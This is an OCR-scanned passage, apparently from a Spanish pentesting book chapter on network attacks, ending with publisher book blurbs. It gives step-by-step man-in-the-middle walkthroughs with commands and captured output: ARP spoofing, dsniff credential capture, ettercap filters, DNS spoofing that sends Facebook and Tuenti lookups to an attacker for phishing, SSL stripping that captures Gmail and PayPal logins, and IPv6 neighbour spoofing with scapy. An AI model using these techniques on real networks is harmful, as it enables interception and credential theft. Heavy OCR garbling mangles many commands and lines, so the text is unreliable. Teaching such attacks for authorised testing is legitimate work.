- Wireshark. El analizador de tráfico por excelencia, Wireshárk permite procesar y а 
todas las tramas de red que son capturadas en un adaptador de red. Esta herramienta 
realizar gran cantidad de ataques de red. 


2. Envenenamiento de redes 


Como se ha visto anteriormente Kali Linux proporciona un listado de aplicaciones p 
envenenamiento y procesamiento de información que circula a través del adaptador de red. 
principal escollo que se puede encontrar el pentester en el instante del envenenamiento de ı ri 
es el protocolo que éstas utilicen. Hoy en día, la inmensa mayoría de redes utilizan el proto: 
IPv4, para el cual existen gran cantidad de ataques. Aunque por otro lado existe el protocolo 
que es el futuro de la informática, para el cual existen también diversos ataques que afei 
confidencialidad de los usuarios, 


Ataques a IPv4 
En este capítulo, más adelante, se estudiarán diversos ataques o formas de atacar la confidence: 
de los usuarios en una red IPv4. A continuación se enumeran diversas formas de ataque Ба} 
protocolo: 


1. ARP Spoofing. 5. Hijacking. 

2. DNS Spoofing. 6. Ataque VPN con PPTP. 
3. SSL Strip. 7. DHCP Rogue. 

4. SSL Sniff. 8. AP Rogue. 


Anm a IPvé 


redes IPv6. A continuación se enumeran una serie de ataques que d: afectar a la confidenci: 
de los usuarios en este tipo de redes: 

- Neighbor Adverticement Spoofing. 

- SLAAC. 

- DHCPv6. 


Pentesting con Ké 


En resumen, Man In The Middle mediante la técnica de ARP Spoofing, es un ataque en el que 
atacante crea la posibilidad de consultar, insertar o modificar información que hay en un canal ent 
2 máquinas sin que ninguna de esas máquinas conozca dicha situación. En otras palabras, un 
con malas intenciones, se colocará entre el equipo 1 y el equipo 2. Cuando el equipo 1 envíe tr 
al equipo 2, dicho tráfico pasará por el equipo del atacante en primer lugar. 


El protocolo ARP tiene dos tipos de mensajes, request y reply. Un paquete request pregunta median 
broadcast a todos los elementos de la red por la dirección física que tiene una dirección IP concreta 
El elemento que tenga dicha dirección IP contéstará con un ARP reply indicando su dirección fi 
en la cabecera. De este modo los equipos aprenden a asociar direcciones físicas a direcciones ] 
Si un usuario malintencionado utilizara los ARP reply, para engafiar y envenenar las tablas de 
elementos se podría capturar el tráfico que no es dirigido para dicho usuario malicioso. 


Como ejemplo se expone la siguiente situación: un atacante utilizará una herramienta a T 
como puede ser e/tercap o arpspoof, para llevar a cabo el ARP Spoofing. El atacante envenenará | 
tablas ARP de las víctimas, enviando mensajes arp reply “engañando” a los objetivos. Este tij 
ataques se realiza en redes conmutadas, ya que en redes con hubs no es necesario, este detalle 
suma importancia. 


El estado inicial de la tabla ARP de la víctima, con dirección IP 11.0.0.3, tiene el siguiente 


Dirección IP Dirección MAC 
11.0.0.1 (router) | СА:ЕЕ:СА:ЕЕ:СА:ЕЕ 


estado inicial de la tabla ARP del router, con dirección IP 11.0.0.1, tiene el siguiente aspecto: 


Dirección IP Dirección MAC > 
11.0.0.3 FA:BA:DA:FA:BA:DA | 


El atacante enviará un par de arp reply, uno a la víctima y otro al router, соп la intención de envenenar) 
falsear la información anterior. Si el atacante dispone de la dirección MAC AA:BB:AA:BB:AA: 
las tablas ARP de los elementos anteriores quedarán de la siguiente manera: 


E 


11.0.0.1 (router) AA:BB:AA:BB:AA:BB 


Dirección ІР Dirección MAC j 


El estado inicial de la tabla ARP del router, con dirección IP 11.0.0.1, tiene el siguiente aspecto: 


Dirección IP Dirección MAC | 
110.03 АА:ВВ:АА:ВВ:АА:ВВ | 


De esta manera todos los envíos de tráfico que realice la víctima a Internet pasarán por la máqui 
del atacante, capturando cookies, credenciales, información de navegación, y todo el tráfico 
cifrado, comprometiendo la privacidad y la confidencialidad del usuario. 
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Algo que hay que tener en cuenta y que ha causado problemas a muchos auditores y usuarios 
malintencionados es el comportamiento de los dispositivos móviles frente a la técnica ARP spoofing. 
Se recomienda que se utilice una máquina física para llevar a cabo el envenenamiento, ya que 
se pueden sufrir problemas de funcionamiento utilizando máquinas virtuales para llevar a cabo el 
proceso, 


Proof Of Concept: arpspoof como piedra base 
En esta prueba de concepto se realizará un ataque de ARP Spoofing básico mediante el uso de 
la herramienta arpspoof de Kali Linux. Además, se mostrará el proceso completo y otro tipo de 
herramientas que permiten filtrar y mostrar información interesante. El escenario es el siguiente: 

- La víctima tiene configurada la dirección IP 192.168.0.59. 

- El atacante tiene configurado la dirección IP 192.168.0.60. 

- El router tiene configurada la dirección IP 192.168.0.248. 


El atacante necesita envenenar la tabla ARP de la víctima indicándole que la dirección física del 
router ha cambiado. Para ello se ejecutará la siguiente instrucción arpspoof —i <interfaz red> -t 
«dirección IP víctima? «dirección IP router>. En la imagen se puede visualizar como se produce 
el envenenamiento de la tabla ARP. 


Eo CEDE с 192.168.9.59 192.168.0.246 
:00:1 27:67:(2:8 0806 42 reply 192.168.0,24 


2:8 0806 42: erp reply 192.168,0.248 is- 
0896 42: 
:b7:f2:8 0896 42: arp reply 192.168.8.248 is-at 8:0:27:14: 


Imagen 08.01: Envenenamiento de la tabla ARP de la victima. 


Una vez que se ha envenenado a la víctima se puede comprobar la tabla ARP de ésta y verificar 
que la dirección física del router ha cambiado. Ahora cuando la víctima envie tráfico hacia Internet 
la enviará primero al atacante y éste la enviará hacia el router, pero para que esto último ocurra se 
debe habilitar el forwarding, para ello se ejecuta la siguiente instrucción echo 1 > /proc/sys/net/ipv4/ 

ip forwarding. Además, para que los paquetes que Цев al router pasen primero рог el atacante se 
- debe ejecutar el arpspoof sobre el router. 


2 168.0.59 
1 8806 42: arp reply 192.168.0.59 is- 
1 9886 42: arp reply 192.168.0.59 15-ат 


:80:1f 00:91:15:24:33:41 6806 42: arp reply 192.168.0,59 1s-at 8:0:27:!| 


Imagen 08.02: Envenenamiento del router y habilitar el reenvío de paquetes. 


Рага visualizar rápidamente que el tráfico de la víctima circula a través del atacante se puede 
"utilizar la herramienta Wireshark. Como se puede apreciar en la imagen el tráfico de la victima está 
circulando a través de la tarjeta de red del atacante. 
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347 7. 133144000 192.168.0.59 173-194, 45.95, л EAT 


253 @ 317575000 192. 168.0. 59, 173.194. 45.60 HTTP 576 СЕТ /testinputassis! 
т 


авї 8616224000 192.168.0.50 173. }94. 5. HTTP 1160 GET Jcsi?v. 


799 24. 050273000 192. 168. 


173.194.45.95 623 ЕТ / НТТР/ 1 


'808 25, 236969000 192. 168.0.39 


Internet Pretocsl version A, Src: 192.188.0.39 (132.109.0.50). Ont: 173.194.45.00 (173,194, 5-Б) 
Transmission Control Protocol, Sre Port: dka (1283), Ost Port: http (80), Seq: 1, Ack: 1, Len: 344 


Host: wew.google.comvn 
Lser-Agent; Pogilla/S.O (windows NT 3.1; rs19.9] Oecko/20100101 Е гай а/д, ругу. 
Imagen 08.03: Captura de tráfico de la víctima mediante ARP Spoofing. 


En este instante cuando la víctima utilice protocolos no seguros toda la información será visualizada 
por el atacante, pudiendo capturar cookies de sesión, imágenes, ficheros, credenciales de acceso а 
sistemas, etcétera, Kali Linux proporciona una serie de aplicaciones, por ejemplo la suite dsniff, con $ 
la que se pueden realizar una serie de operaciones para filtrar contenidos o recuperar información 
interesante del flujo de datos que circulan por la tarjeta de red del atacante. 


Con la herramienta driftnet se pueden mostrar las imágenes que la víctima está visualizando, como | 
se puede observar en la imagen. Además, la herramienta URLSnarf permite conocer las peticiones | 
URL que la víctima está realizando, el desempeño de esta herramienta hace que sea de suma utilidad; 


оої@ка11:-# driftnet 


Imagen 08.04: Ejecución de drifinet. 
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Furisnarf 
listening on eth8 [tcp port 88 or port 8080 or port 3128] 
1192.168,0,59 - - [08/Apr/2013:13:22:46 48208] "GET http://www.google.com/ HITP/1| 
.l" - - "-" "Mozilla/5.8 (Windows NT 5.1; rv:10.0) Gecko/20100101 FLrefox/18.0" 
| 0.59 - - [08/Apr/2013:13:22:46 +8208] "GET һїїр://мммы.доод\е.ев/ HTTP/1. 
| 1" - - "-" "Mozilla/S.8 (Windows NT 5.1; гу:19.9) Gecko/20100101 Firafox/10.0" 
| d 59 - - (08/Apr/2013:13:22:46 +9208] "GET http://www.google 
Is-webhp&ac t 10n-8e-17259, 18167 ‚39523 ‚4998116 4091569 , 4801947 ‚4991959, 
| 464 ‚4082734 ‚4003518 ‚4003551 ‚4083917,4984036 , 4004181 , Md: 4094257 ,4884271 , 4004| 
| 319, 4004334 , 4004341 , 4604653, 4094687 , 4984697 , 4984728, 4004766 , 4004788, 4004844, 4004 


Imagen 08.05: Ejecución de URLSnarf. 


| La herramienta dsniff permite realizar la captura de credenciales que viajan por protocolos по 
Seguros. 


En la imagen se puede visualizar la captura de credenciales del protocolo FTP, la cual podría verse 
con Wireshark, pero con el uso de dsniff se evita tener que realizar la búsqueda en el fichero CAP. 


[ootakali; 4 беп 
listening on её 


Imagen 08.06: Ejecución de dsniff. 


Por último se va a estudiar el uso de la herramienta hexinject. Esta interesante herramienta permite 
sniffar, e incluso modificar, los paquetes que circulan por el adaptador de red del atacante. En otras 
palabras permite visualizar el contenido en hexadecimal o “en crudo” y poder modificar en tiempo 
real dicha información. 


А continuación se enumeran una serie de parámetros interesantes рага el funcionamiento de hexinject: 


Parámetro Descripción 
-5 Modo sniffer. 
-p Modo inyección. 
-T Modo crudo o raw. 
-i Interfaz de red. 
-с Número de paquetes a capturar. 
Filtro a aplic: 


Por ejemplo sí se requiere sniffar el paquete y filtrar ciertos contenidos se puede utilizar la siguiente 
instrucción hexinject —s —i eth0 —r | strings | grep “Host”. Hay que recordar que el MITM debe estar 
funcionando simultáneamente. 


оої@Ка11:-# hexinject -s -i ethü -r | strings | grep Host” 
ost: www.flu-project.com 

Www. flu-project.com 

pagead2 .googlesyndication.com 

pagead2 .googlesyndication.com 

эмм. fLu-project .com 
www. flu-project.com 
мим. ETE Айт. con 


pues 0807: БУТ de hexinject en modo sniffer. 


Pero quizá lo más impactante de hexinject sea su sencillez para inyectar o reemplazar cont 
los paquetes que el atacante está interceptando. En el siguiente ejemplo se puede observar 
contenido sniffado modifica el paquete ARP para cambiar una petición por una respuesta, Con. 
ejemplo se muestra el potencial de la herramienta. La sintaxis es sencilla hexinject -s –і ethü -f 
c 1 | replace '06 04 00 01* '06 04 00 02" | hexinject -p —i eth0. Para visualizarlo en pantalla: 
inyecta, como se puede ver en la imagen. 

1-# hexinject -s 1 etha -f "arp! -c 1 | replace '06 04 88 01 '86 04 6] 


Е FF FF FF FF FF 88 15 5D 80 C9 02 08 06 80 01 08 00 06 04 00 02 0G 15 50 00 co 


n2 FOE TE FA M M ve 00 00 м CO M 90 FC 06,00 0,00 00/00 86,06 09 00 00 6 


Imagen 08.08: Inyección o modificación del contenido de un paquete. 


Proof Of Concept: Ettercap y los filtros 
En esta prueba de concepto se utiliza ettercap que posibilita realizar Man In The Middle sobre 
dispositivo de la red. Ettercap también permite aplicar filtros sobre la información que se recibe 
la víctima, con el fin de obtener la información ütil y despreciar la no relevante, o incluso 
posibilidad de modificar el contenido que se reenvía a la víctima. Estas situaciones pueden ser ú 
para el pentester en ciertas ocasiones. 


Realizar MITM con Etrercap es realmente sencillo si se realiza desde la interfaz gráfica. Se deb 
escanear los equipos de la red y elegir los dos targets. Una vez elegidos estos se lanza el MIT! $ 
teniendo en cuenta que se pueden preparar filtros previos. A 
A continuación se especifica un ejemplo de filtro con el que se busca reemplazar las imágenes qu 
se solicitan: 


if (ip.proto == TCP && tcp.src == 80) ( 
replace (“img src=", "img src-V'http://www.flu-project.com/logo.pngV" “); 
) 


Para compilar el filtro se ejecuta la orden etterfilter «nombre filtro? -o filtro.ef. Después se d 
cargar dicho filtro mediante la interacción con Ettercap en la pestaña Filters. Este sistema de fil 
aporta una funcionalidad extra muy interesante a Ettercap, la cual es muy similar a fusionar 
aplicaciones arpspoof y hexinject. 
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DNS Spoofing 


Esta técnica consiste en falsear los resultados de las consultas DNS de una víctima. El objetivo de 
este ataque es que la resolución de nombres de dominio será falseado por el atacante y la víctima 
recibirá una dirección IP falsa a la que se conectará, pensando que es el dominio verdadero. Este 
ataque se apoya en la técnica de MITM, gracias a ARP Spoofing o Rogue AP. 


El ataque puede ser local o remoto y esta diferencia sí es importante. Si el servidor DNS se encuentra 
en la red local o LAN, el atacante debe envenenar las tablas ARP de la víctima y del equipo que 
dispone del servidor DNS local. No se debe envenenar la tabla ARP del router ya que la petición 
al DNS será local. Sin embargo, si el servidor DNS es remoto, es decir, se encuentra en Internet, el 
envenenamiento se debe realizar entre la víctima y el router. Esta aclaración es importante para que 
el ataque tenga éxito. 


Por último indicar que el objetivo del ataque será proporcionar una dirección IP falsa con la que la 
víctima se conectará, La dirección IP a la que se conecte, generalmente, proporcionará un phishing 
o un sitio web con un exploit que se lanzará sobre el equipo que realiza la petición o algún derivado 
de estos dos ataques expuestos. 


- Proof Of Concept: Controlando las resoluciones DNS 
En esta prueba de concepto el atacante controlará las resoluciones de las peticiones DNS de la 


víctima mediante el uso de la herramienta dnsspoof y utilizando arpspoof para realizar la técnica 
MITM. 


El escenario es el siguiente: 


- Una víctima con Microsoft Windows XP SP3 y utiliza un servidor DNS externo a la red 
local, por ejemplo el DNS de Google 8.8.8.8. 

- Оп atacante con Kali Linux. 

- Atacante y víctima se encuentran en la misma LAN. El atacante interceptará las peticiones 
y respuestas DNS proporcionando la dirección IP que él quiera mediante la construcción de 
un fichero hosts especial. 


En primer lugar el atacante realizará MITM a la víctima mediante ARP Spoofing. Como ya se ha 
estudiado anteriormente, realizar dicha operativa es algo sencillo con la herramienta arpspoof. 
Una vez el tráfico circula por el equipo del atacante, se construye un fichero hosts con el que se 
configurará la herramienta dnsspoof. En este fichero se especificarán las direcciones IP acordes a los 
nombres de dominio que se quieren spoofear. 


El siguiente fragmento simula el fichero de texto editado: 


192.168.0.57 *.tuenti.com 
 192.168.0.57 tuenti.com 
192.168.0.57 *.facebook.com 
192.168.0.57 facebook.com 


Una vez creado el fichero se debe ejecutar la herramienta dnsspoof con la siguiente sintaxis dı 
—i eth0 -f «fichero de hosts>. 


otho -f hosts.txt 
[udp dst port 53 and not src 192.168,0.57] 
681+ A? estaticosakl.tuenti.com 


681+ A? estaticosak!.tuenti.com 
1272+ А? www.tuenti.com 
1272« А? ww tuenti „сот 


Imagen 08.09: Resolución de nombres falsa con dnsspoof. 


ГА 
Tal y como se puede apreciar, las resoluciones de la víctima al acceder al sitio web fuenti.co 
realizan con una dirección IP falsa, que coincide con la del atacante. De esta manera tan sen 
puede realizar un phishing casi perfecto, teniendo en cuenta que el sitio web es una clonación 
original. “4 


Por otro lado, la víctima puede detectar esto si al comprobar el estado de su caché descubre q 
resolución de nombres de dominio hacia tuenti se han quedado en una dirección IP local, 
extrañaría, y mucho, al usuario final. 


tro 
Ti de мезет 
Чек а de dat k 
Sección . * res Н s 
Un registro (host) . . : 
static.tuenti.com 


stro . . : static.tuentí.com 
Har de registro т: | 


Un registro (host? 


www .stopbadware .о: 


Nombre de regist: sto] duare.org 
Tipo а кона 


ida P3 
Longitud de datos 


respuesta 
cf 55118624-protected-wwv.stopbadware .org 


tuenti.com 


Nombre de registro . - 
Tipo de registro 


4 
ti 
Un registro (ost) . . : 197-168-8.57 
Imagen 08.10: Caché DNS manipulada apuntando a la dirección IP del atacante. 


Por último comentar que se podría utilizar webmitm para generar un certificado autofirmado, el 
sería proporcionado a la víctima para suplantar conexiones HTTPS. El problema de esta acción € 
que el navegador informará de que la identidad del servidor no se corresponde con el certificado 
En un entorno donde los usuarios estén acostumbrados a aceptar certificados que no pueden st 
validados, no existiría problema ninguno, ya que éstos verían con buenos ojos dicha acción. 
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- SSL Strip 


En 2009 el hacker Moxie Marlinspike ранит e implementó cómo llevar a cabo un hijacking de 
sesión al protocolo HTTPs. Se encargó de implementar un script en Python con el que llevar a cabo 
dicho ataque, cuyo objetivo es el de forzar el cambio de tipo de conexión. 


Mediante la realización de un MITM el atacante intercepta las peticiones que la víctima realiza. El 
- servidor redireccionará las peticiones HTTP de la víctima a HTTPs y será en este instante cuando 
el atacante filtrará el HTTPs devolviendo a la víctima HTTP. Se puede realizar una instantánea del 
entorno de la siguiente manera: 

- La conexión entre el atacante y el servidor viaja bajo HTTPs. 

- La conexión que el atacante devuelve a la víctima viaja bajo HTTP. 


- Proof Of Concept: SSL Strip 


En esta prueba de concepto se utilizará MITM junto a la técnica SSL Strip con el fin de engañar 
al usuario y presentar el contenido seguro de manera insegura. Cuando la victima introduzca 
credenciales o inicie sesión, el contenido de ésta y de las credenciales serán capturadas en texto 
plano por el atacante. 


1 escenario es el siguiente: 

- La víctima dispone de Microsoft Windows XP SP3 y utiliza un navegador como Firefox 
o Internet Explorer. 

- El atacante utiliza Kali Linux. 

- Víctima y atacante se encuentran en la misma red local. 


primer lugar se realiza el MITM sobre la víctima con arpspoof. Una vez que el tráfico circula 

través del atacante se debe añadir una redirección de tráfico en iptables. Esta redirección lo que 

іса es que todo el tráfico que se dirija al puerto 80 será posteriormente redirigido al 10000, o al 

que se le indique. En el puerto 10000 se encontrará una aplicación denominada ss/strip que 
encargará de evitar que la victima acceda a tráfico HTTPS. 


"destination-port 80 -J RED 


ssisniff sslstrip 


|rootakati:-f sslstrip -w sst 


isistrip 0.9 by Moxie Marlinspike running... 


Imagen 08.11: Configuración de SSL Strip. 


vez que se tiene configurada la aplicación se debe esperar a que la víctima acceda a recursos 
еп condiciones normales irían sobre HTTPS. En la imagen se pueden visualizar las pruebas que 
realizado con gmail o paypal. 
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ООМОТАААВОЦ ААААмцАр: 
Do 0P964 IgE t GoTv/kNB3uXV7 f -QZVgvGSVL c isdAPhsgpLWe23a7al AKBccOHnZf'qoLobXs Dj GN 
ST5- 


. OWZw8o zlksPuOIG-QvahCdgQQj BouudzzLhbWI et zdnbAwyAK 1K79dr f 7 QeHnBKR1 -7v 
R2v3DcKDJIsQFhXYhxTvOSiEg4TeuLb0GJzL9b -uwK3 NAwwGyd rVSySYUSKOxBuMVc -N61 vaOkE4071) 
dJoh7JQ01gxAIOlqzvGt feBnq g-fttzvtIFAd10JxA7NPQSEma11 =Ка1 i &Passwd-123abc .&signl 

iccadertPersi stent Cooki serna 


7FXSkR90Q-PLh6NZSSlogi n: anail=kal 1%48ка1 1. 


Imagen 08.12: Obtención de credenciales de sitios web que irían Бајо HTTPS. 


Lo único que el usuario o víctima vería es que en la barra de direcciones el protocolo que se st 1 
utilizando es HTTP y no HTTPS como sería lo normal. 


Hijacking 
El hijacking o secuestro de sesión consiste en apoderarse de la sesión iniciada por un usuario y po 
utilizarla para el beneficio del atacante. Este tipo de técnicas se realiza desde protocolos de la c 
de transporte hasta el de aplicación. Su vertiente más famosa es el robo de sesión en el protoco 
HTTP, gracias a la interceptación de cookies de usuario. 


Este ataque se apoya en MITM para conseguir que el tráfico circule a través del atacante, 
vez que esto ese ha conseguido se filtra la información interesante como puede ser una cookie 
atacante se presentará ante el servidor con la cookie de usuario correspondiente a la víctima, por 
que podrá acceder a los recursos que ésta estaba utilizando en Internet. 


IPv6 \ 


En este apartado se explican los ataques básicos en el protocolo de red IPv6. En primer lugar se 
hablará del ataque neighbor advertisement spoofing en el que mediante paquetes ICMPv6 se informa | 
de la situación de los vecinos. Existen diferentes tipos de paquetes que son: 

- Router solicitation. 

- Router advertisement. 

- Neighbor solicitation. 

- Neighbor advertisement. 

- Redirect. 


En IPv6 no existe el protocolo ARP, por lo que como se mencionó anteriormente los equipos 
aprenden sobre los vecinos gracias a ICMPv6. Se puede utilizar, como se realizaba en ARP, anuncios. 
y cambios de direcciones físicas con ICMPv6. o 


El ataque SLAAC tiene como objetivo engañar a un equipo que se conecta a Іа red. El atacante debe. 
realizar las funcionalidades de router y disponer de dos interfaces, una que soporte IPv6 solamente 
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y otra con IPv4. Los sistemas operativos como Microsoft Windows o Mac OS X, prefieren utilizar 
el protocolo IPv6 en una red siempre y cuando sea posible. Además, IPv6 está pensando para 
configurarse al máximo, por lo que se obtendrá automáticamente información del router falso que 
el atacante ha preparado. 


Proof Of Concept: Envenenando vecinos con ICMPv6 

En esta prueba de concepto se realizaría un Man In The Middle en un canal de comunicación local 
donde solo existe el protocolo IPv6 para comunicarse. La idea es muy similar a como ocurría en el 
protocolo IPv4. 


El escenario es el siguiente: 
- Existe una máquina X la cual quiere comunicarse con la máquina Z. 
- El atacante representa la máquina Y. 


- El atacante utilizará el protocolo Neighbor Advertisement y Neighbor Discovery para 
llevar a cabo el ataque. 


Cuando el equipo X quiera comunicarse con el equipo Z necesitará conocer la dirección física del 
equipo Z. Para obtenerla en una red IPv6 utilizará un mensaje ICMPv6 de tipo Neighbor Solicitation 
a una dirección IPv6 de tipo multicast. En esta dirección todos los nodos de la red escucharán e 
intentarán identificarse. La dirección IPv6 tiene el siguiente formato “f102::1:MXX:Y YZZ”, siendo 
XXYYZZ los últimos tres hytes de la dirección IPv6 con la que se quiere comunicar. La máquina Z 
contesta a la máquina X con un mensaje ICMPv6 de tipo Neighbor Advertisement donde se envía la 
información necesaria para la comunicación. 


Entendiendo el comportamiento, similar al del protocolo ARP en redes IPv4, la máquina Y realizará 
el ataque mediante el envío de mensajes ICMPv6 de tipo Neighbor Advertisement indicando a la 
víctima que la dirección de un nodo legítimo se corresponde con la del atacante. 


No existe ningún mecanismo en la implementación de IPv6 que impida que el atacante pueda enviar 
este tipo de mensajes, no existe la autenticación en este protocolo. Por este hecho, después de la 
recepción del mensaje malicioso las cachés de la máquina X y Z estarán spoofeadas. 


Para realizar el envenenamiento de la tabla de vecinós que tiene un equipo se utilizará la herramienta 
сару, con la que se pueden generar distintos paquetes según quiera configurar el atacante. La 
versatilidad y flexibilidad de la herramienta es enorme, proporcionando al auditor la posibilidad de 
generar cualquier tipo de tráfico, configurando incluso el número de repeticiones e intervalos en los 
envíos de los paquetes. 


La víctima es un equipo con Microsoft Windows 7 y en la imagen se puede visualizar como mediante 
la ejecución de la instrucción netsh interface іруб show neighbors se obtiene la tabla de vecinos, es 
decir, las direcciones IPv6 asociadas a una dirección fisica. En otras palabras, la “tabla de vecinos" 
ез similar a la tabla ARP, en la práctica es el equivalente. 
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Dirección física 


182::1:2 
Interfaz 13: Conexión de área locale 6 


Dirección de Internet Dirección física Tipo 
#@2::16 255.255.255.255:65535 Permanente 
$82::1:2 255.255.255.255:65535 Permanente 


interfaz 11: Conexión de área local 


Dirección física 


Imagen 08.13: Consulta de tabla de vecinos en Windows 7. 


Para arrancar scapy se debe ejecutar la instrucción que lleva su nombre, tal y como se puede 
visualizar en la imagen. 


Una vez arrancado el intérprete, se generará el paquete por capas, para que sea más intuitivo se 
creará el paquete de las capas inferiores, (Ethernet), a las más altas, finalizando el paquete en la 
configuración del protocolo ICMPv6. 


`оот@ёка11:-# scapy 

INFO; Can't import python gnuplot wrapper . Won't be able to plot. 
INRNING: No route found for IPv6 destination :: (no default route?) 
come to Scapy (2.2 

po» istEther) 


ре : XShortEnunField 
> ether-(Ether(dst-'88. "eg y 
ipv6=IPv6(src="f080: :a90:27f A fe :8е4:52е 


'eyboardInterrupt 
* E fc: 
na=ICMPV6ND_NA(tgt='f0B0::a00:271f:fat4:B01f',R=0, S=1) 
> Ula=ICMPVENDOptsDstLLAddr(Lladdr="08:00:27:14:80:11*) 
raceback (most recent call last]: 
File "«console»", line 1, in «module» 
Error: name 'ICMPvéNDOptsOstLLAddr' is not defined 
Lla=ICMPVBNDOPtOstLLAddr(lladdr="08:00:27:14:80:1f') 


Imagen 08.14: Generación paquete IPv6 con scapy. 


Una vez generado el paquete se puede visualizar un resumen de éste y repasar que la configuración | 
es correcta. En el caso de las direcciones IPv6 se debe tener claro cuál es la que se quiere spoofear і 
e indicarlo en el paquete IPv6. 


Capitulo VIII. Ataques a Redes En 


Vather/ipv6/na/lla] .display() 
L Ethernet J888 

dste 88:00:27 :44:cd:2a 
Srem 88:00:27: f4:8e:1f 


fc :8а4:52ез:ааёс 
L ICNPv6 Neighbor Discovery - Neighbor Advertisement 1988 
type= Neighbor Advertisement 


P 
r= 08:98:27: f4:8o:1f 
ТТА 7 


: Visualización del paquete generado y envío de éste. 


Por ültimo, para comprobar que los neighbor advertisement están llegando se realiza una captura 
соп Wireshark en el equipo de la víctima, y se puede visualizar como el paquete generado con scapy 
está llegando y engañando al sistema operativo. 


а Destination: cadmusco 44:cd: d 
8 Source: CadmusCo f4:Be:1f (08:00:27:f4:8e:: 
Type: труб (ox86dd) 


| оооо 0000 = Traffic class: 0x00000000 
И = Flowlabel: 0х00000000 


Source: feB0::00:27ff:fef4:Self (fe80::a00:27ff:fef4:Belf) 
Destination: feB0::9fc:8a4:52ea:aa0c (feB0::9fc:8a4:52ea:aa0c) 


Type: 136 (Neighbor advertisement) 
Code: 0 
Checksum: Oxcede [correct] 

& Flags: 0x60000000 


| 
l Target: fe80::200:27ff: 
| E ICMPVÓ option (Target link-layer address) 
T Type: Target línk-layer address (2) 
Length: 8 

Link-laver address: 08:00:27:f4:8e:1f 


Imagen 08.16: Neighbor Advertisement spoofeado que llega a la víctima. 
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Imagen 08.12: Obtención de credenciales de sitios web que irían bajo HTTPS. 
Imagen 08.13: Consulta de tabla de vecinos en Windows 7. 
Imagen 08.14: Generación paquete IPv6 con scapy. .. 
Imagen 08.15: Visualización del paquete generado y envío de éste. 
Imagen 08.16: Neighbor Advertisement spoofeado que llega a la victima. 


'ambio de directorio y subida de archivo. 


Libros publicados Eg 
Libros publicados 


Estos libros pueden ser obtenidos desde la web: http://www. OxWORD. com 


Saber qué ha pasado en un sistema es una pregunta de obligada 
respuesta en múltiples situaciones. Un ordenador del que se 

peu ББ ан sospecha que alguien está teniendo acceso al mismo, porque se 
teet está diseminando información que sólo está almacenada en él, un 
empleado que sospecha que alguien está leyéndole sus correos 
personales o una organización que cree es endo espiada por la 
competencia son situaciones comunes en las empre 


En este libro se describen los procesos para realizar la captura 
de evidencias en sistemas Windows, desde la captura de datos 
almacenados, hasta la extracción de elementos volátiles como 
ficheros borrados, archivos impresos o datos que se encuentran en 
la RAM de un sistema. Todo ello, acompañado de las herramientas 
necesarias para que un técnico pueda realizar sus investigaciones. 


El final del año 2007 trajo consigo la necesidad de reactivar 
las iniciativas de aplicación de la normativa vigente en materia 
de protección de'datos de carácter personal. Desde entonces la 
actualización de los proyectos en curso y la puesta en marcha 
de otros nuevos han constituido una prioridad para numerosas 
empresas en el Estado Español. Sin embargo la aplicación de 
la legislación vigente no está siendo ni tan generalizada ni tan 
rigurosa como se esperaba. 


La lectura y consulta de este libro permitirá al lector alejar muchos 
de los “miedos” y dudas que ahora le asaltan respecto de la LOPD 
y su nuevo reglamento, impidiendo en muchas ocasiones que 
empresas y organizaciones se encuentren en un situación legal 
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front 
at Management Gateway 


Microsoft 
SharePoint 2010: Seguridad 


DNI-e 


Tecnología y Usos. 


Microsoft Forefront Threat Management Gateway [TMG] 2010 
es la ültima evolución de las tecnologías Firewall, Servidor VPN 
y servidor Caché de la compañía Redmond. Después de haber 
convencido a muchos con los resultados de MS /SA Server 2006, 
esta nueva evolución mejora en funcionamiento y en características. 
la versión anterior. 

En este primer, libro en castellano dédicado íntegramente a este 
producto podrá aprender como instalarlo, como configurarlo en la 
empresa en configuraciones stand alone y en cluster NLB, como 
configurar las reglas de seguridad, los servicios NIS que hacen uso 
de la tecnología САРА o el servicio de protección continua de MS 
Forefront Web Protection Service, entre otras muchas opciones. 


Microsoft SharePoint 2010: Seguridad es un libro pensado para 
aquellos responsables de sistemas o seguridad, Arquitectos IT, 
Administradores o técnicos que deseen conoce como fortificar una 
arquitectura SharePoint Server 2010 o Share Point Foundation 
2010. El libro recoge desde los apartados de fortificación 
iniciales, como la configuración de los sistemas de autenticación 
y autorización, la gestión de la auditoría, la creación de planes de 
contingencia, la copia y restauración de datos, la publicación de 
forma segura en Internet y la técnicas de pentesting y/o ataques 
a servidores SharePoint. Un libro imprescindible si tiene a cargo 
una solución basada en estas tecnologías. 

Rubén Alonso ha sido premiado por Microsofi como MVP en 
tecnologías SharePoint. 


El DNI electrónico está entre nosotros, desde hace bastante 
tiempo pero, desgraciadamente, el uso del mismo en su faceta 
electrónica no ha despegado. Todavía son pocas las empresas y los 
particulares que sacan provecho de las funcionalidades que ofrece. 
En este libro Rames Sarwat, de la empresa SmartAccess, desgrana 
los fundamentos tecnológicos que están tras él, y muestra cómo 
utilizar el DN/-e en entornos profesionales y particulares. Desde 
autenticarse en los sistemas informáticos de una empresa, hasta 
desarrollar aplicaciones que saquen partido del DNI-e. 

Rames Sarwat es licenciado en Informática por la Universidad 
Politécnica de Madrid y socio fundador y director de SmartAccess. 
Anteriormente ejerció como Director de Consultoría en Microsoft.. 


Libros publicados 


Anuario ilustrado de seguridad informática, anécdotas y 
entrevistas exclusivas... Casi todo lo que ha ocurrido en seguridad 
en los últimos doce año: а dentro de “Una al día: 12 años de 
seguridad informática”. 


Una al día 


Para celebrar los doce años ininterrumpidos del boletín Una al 
día, hemos realizado un recorrido por toda una década de virus, 
vulnerabilidades, fraudes, alertas, y reflexiones sobre la seguridad 
en Internet. Desde una perspectiva amena y entretenida y con 
un diseño sencillo y directo. Los 12 años de Una al día sirven 
de excusa para un libro que está compuesto por material nuevo, 
revisado y redactado desde la perspectiva del tiempo. Además de 
las entrevistas exclusivas y las anécdotas propias de Hispasec. 


La información es clave en la preparación de un test de penetración. 
Hacking con buscadores: Sin ella no es posible determinar qué atacar ni cómo hacerlo. Y los 
Google, Bing £ Shodan i: 

а buscadores se han convertido en herramientas fundamentales рага 
la minería de datos y los procesos de inteligencia. Sin embargo, 
pese а que las técnicas de Google Hacking lleven años siendo 
utilizadas, quizá no hayan sido siempre bien tratadas ni transmitidas 
al público. Limitarse a emplear Google Dorks conocidos o a usar 
„ con respecto al uso de 
los buscadores, lo mismo que usar una herramienta como Nessus, 


herramientas que automaticen esta tarea e: 


о quizá el autopwn de Metasploit, y pensar que se está realizando 
un test de penetración. Por supuesto, estas herramientas son ütiles, 
pero se debe ir más allá, comprender los problemas encontrados, 
